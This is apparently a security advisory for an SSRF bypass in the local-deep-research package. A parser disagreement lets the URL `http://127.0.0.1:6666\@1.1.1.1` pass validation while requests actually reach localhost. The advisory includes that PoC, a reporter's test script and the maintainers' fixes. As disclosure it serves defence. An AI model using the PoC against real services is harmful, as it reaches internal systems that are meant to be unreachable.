local-deep-research has an SSRF bypass in `safe_get`
🔗 CVE IDs covered (1)
📋 Description
Summary
The URL validation logic in local-deep-research has a logic flaw that lets attackers bypass the check, leading to SSRF attacks.
Details
The project uses `validate_url` to validate the input URL. Its main logic runs security checks on the host portion of the URL, as extracted by `urlparse`, to prevent SSRF attacks.
However, `urlparse` and the library that actually sends the request do not parse URLs identically. For example, `safe_get` first calls `validate_url` to perform the SSRF check and then calls `requests.get` to send the actual request.
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
- `urlparse()` treats `\` as a regular character and `@` as the userinfo-host delimiter, so it extracts the hostname as `1.1.1.1` (public).
- `requests` treats `\` as a path character, so it connects to `127.0.0.1` (internal).
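The disagreement can be reproduced without the project code. The following is a minimal sketch, assuming `urllib3` is installed (it is the parser named in the maintainer note further down); the helper names `host_seen_by_urlparse` and `host_seen_by_urllib3` are hypothetical and exist only for this illustration.

```python
from urllib.parse import urlparse

# Raw string so the backslash reaches the parser unchanged.
POC = r"http://127.0.0.1:6666\@1.1.1.1"


def host_seen_by_urlparse(url: str):
    """Host as computed by the standard-library parser."""
    return urlparse(url).hostname


def host_seen_by_urllib3(url: str):
    """Host as computed by urllib3, or None if urllib3 is not installed."""
    try:
        from urllib3.util import parse_url
    except ImportError:
        return None
    return parse_url(url).host


if __name__ == "__main__":
    print("urlparse:", host_seen_by_urlparse(POC))
    print("urllib3: ", host_seen_by_urllib3(POC))
```

If the two printed hosts differ, any validator built on the first parser is checking a different destination than the one the HTTP client will contact.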
Below is a test script I wrote against the project code.
#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""
from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):

    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"
    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
    # Hardcoded URL for demonstration.
    url = "http://127.0.0.1:6666"
    # Raw string: "\@" is not a valid escape sequence in a normal literal.
    # url = r"http://127.0.0.1:6666\@1.1.1.1"
    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()
When an attacker uses `http://127.0.0.1:6666/`, the existing detection logic recognizes it as an internal network address and blocks it.
However, when an attacker uses `http://127.0.0.1:6666\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, a public IP address, so the URL passes validation. When the request is actually sent, `requests.get` directs it to `http://127.0.0.1:6666`, which bypasses the detection and achieves SSRF.
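The pass/block behaviour described above can be illustrated with a stand-in check. This is a sketch only: `naive_is_allowed` is a hypothetical function that mirrors the described approach (judge the host returned by `urlparse`), not the project's actual `validate_url`, and it handles literal IP hosts only.

```python
import ipaddress
from urllib.parse import urlparse


def naive_is_allowed(url: str) -> bool:
    """Hypothetical check: allow a URL only if urlparse's host is a public IP."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostnames would need DNS resolution; out of scope for this sketch.
        return False
    return addr.is_global


if __name__ == "__main__":
    print(naive_is_allowed("http://127.0.0.1:6666/"))           # False: loopback is blocked
    print(naive_is_allowed(r"http://127.0.0.1:6666\@1.1.1.1"))  # True: the check sees 1.1.1.1
```

The second result is the bypass: the check approves a URL whose real destination, as seen by the HTTP client, is the loopback address.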
PoC
http://127.0.0.1:6666\@1.1.1.1
Impact
SSRF
Maintainer note (2026-05-15)
Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation
spans four PRs, all merged to main and shipped in v1.6.10:
#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential bypass:
- New `RFC_FORBIDDEN_URL_CHARS_RE` in `security/ssrf_validator.py` rejects URLs containing backslash, ASCII control bytes, or whitespace; RFC 3986 forbids these and their presence signals a parser-differential attempt.
- Host extraction switched from `urllib.parse.urlparse(url).hostname` to `urllib3.util.parse_url(url).host`. `urllib3` is the parser `requests` uses internally, so the validator and the HTTP client now agree on the destination by construction, closing the `\@` divergence that drove the PoC.
- Same two-layer defence applied to `NotificationURLValidator.validate_service_url`.
- 53 new tests across `test_ssrf_validator.py`, `test_notification_validator.py`, `test_safe_requests.py`, and `test_ssrf_redirect_bypass.py`, including the advisory PoC `http://127.0.0.1:6666\@1.1.1.1` and the post-prepare canonical form `http://127.0.0.1:6666/%5C@1.1.1.1`.
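The character-rejection layer can be sketched as follows. The pattern here is an assumption written for illustration: the actual `RFC_FORBIDDEN_URL_CHARS_RE` in the project may differ, and the names `FORBIDDEN_URL_CHARS` and `has_forbidden_chars` are hypothetical. This version covers backslash, ASCII control bytes, and ASCII whitespace only.

```python
import re

# Assumed pattern: backslash, ASCII control bytes (0x00-0x1F, 0x7F), and space (0x20).
# Tab, CR, and LF fall inside the 0x00-0x20 range. Unicode whitespace is not covered.
FORBIDDEN_URL_CHARS = re.compile(r"[\\\x00-\x20\x7f]")


def has_forbidden_chars(url: str) -> bool:
    """Return True if the URL contains a character this sketch rejects outright."""
    return FORBIDDEN_URL_CHARS.search(url) is not None


if __name__ == "__main__":
    for candidate in (
        r"http://127.0.0.1:6666\@1.1.1.1",    # advisory PoC
        "http://127.0.0.1:6666/%5C@1.1.1.1",  # canonical form, backslash already encoded
        "https://example.com/path?q=1",
    ):
        print(candidate, has_forbidden_chars(candidate))
```

The canonical form contains no raw backslash, so a character filter alone does not flag it. That is one reason a second layer, host extraction with the same parser the client uses, is still needed to see `127.0.0.1` as the destination.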
#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.
#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.
#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16
6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private
IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an
operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments,
but cloud metadata IPs remain blocked regardless.
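A prefix check of this kind can be sketched with the standard-library `ipaddress` module. The four prefixes are the ones listed above; the names `TRANSITION_PREFIXES` and `in_transition_prefix` are hypothetical, and the NAT64 opt-in and the metadata-IP handling are not modelled here.

```python
import ipaddress

# Prefixes taken from the note above: 6to4, NAT64, Teredo, discard.
TRANSITION_PREFIXES = [
    ipaddress.ip_network(prefix)
    for prefix in ("2002::/16", "64:ff9b::/96", "2001::/32", "100::/64")
]


def in_transition_prefix(host: str) -> bool:
    """Return True if host is an IPv6 literal inside one of the listed prefixes."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal
    if addr.version != 6:
        return False
    return any(addr in network for network in TRANSITION_PREFIXES)


if __name__ == "__main__":
    # 64:ff9b::7f00:1 embeds 127.0.0.1 in the NAT64 prefix.
    for host in ("64:ff9b::7f00:1", "2002:7f00:1::", "2606:4700:4700::1111", "127.0.0.1"):
        print(host, in_transition_prefix(host))
```

Both of the first two addresses carry the bytes of `127.0.0.1` inside an IPv6 address, which is how an IPv6-wrapped form could otherwise slip past an IPv4-only private-range check.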
Affected versions
- The specific parser-differential bypass described above exists from v1.3.0 (when `validate_url` was first introduced) through v1.6.9. The validator used `urlparse(url).hostname` for that entire span.
- Versions before v1.3.0 had no SSRF validator at all: requests went directly to `requests.get()` without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.
In both cases the remediation is the same: upgrade to v1.6.10 or later.
🎯 Affected products (1)
- pip/local-deep-research:< 1.6.10